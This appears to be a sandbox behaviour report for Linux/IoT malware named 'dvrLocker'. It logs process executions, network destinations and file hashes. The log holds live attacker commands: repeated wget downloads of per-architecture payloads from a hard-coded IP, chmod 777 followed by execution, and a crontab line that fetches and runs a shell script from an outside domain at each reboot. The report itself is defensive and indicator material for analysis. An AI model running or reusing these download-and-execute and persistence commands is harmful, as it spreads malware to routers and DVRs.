[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/703/exe]

/bin/ls

[ls -l /proc/705/exe]

/bin/ls

[ls -l /proc/707/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/709/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/710/exe]

/bin/ls

[ls -l /proc/711/exe]

/bin/ls

[ls -l /proc/712/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf mpsl]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

Network

Country Destination Domain Proto
LT 45.125.66.90:80 45.125.66.90 tcp
DE 217.160.70.42:53 kingstonwikkerink.dyn udp
US 128.254.146.232:17289 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/var/spool/cron/crontabs/tmp.Uw0tZs

MD5 2fbaf9a94577da61ead6786557355f03
SHA1 09a7a8bb07b2e052e230744a7a2dfff6a649776b
SHA256 f6a6bc7ee3507b8c07807574731ad14c35195252608a2223e5885e772f9bf4c1
SHA512 a45c2cb4da881374a691023c8f27caa273f27ab1a533d67191a5f4cee4ef19d41f4c01084e9dfbcd5c086e9d7f2fc237f7d8d33242a84d387459bd13dcd16ba3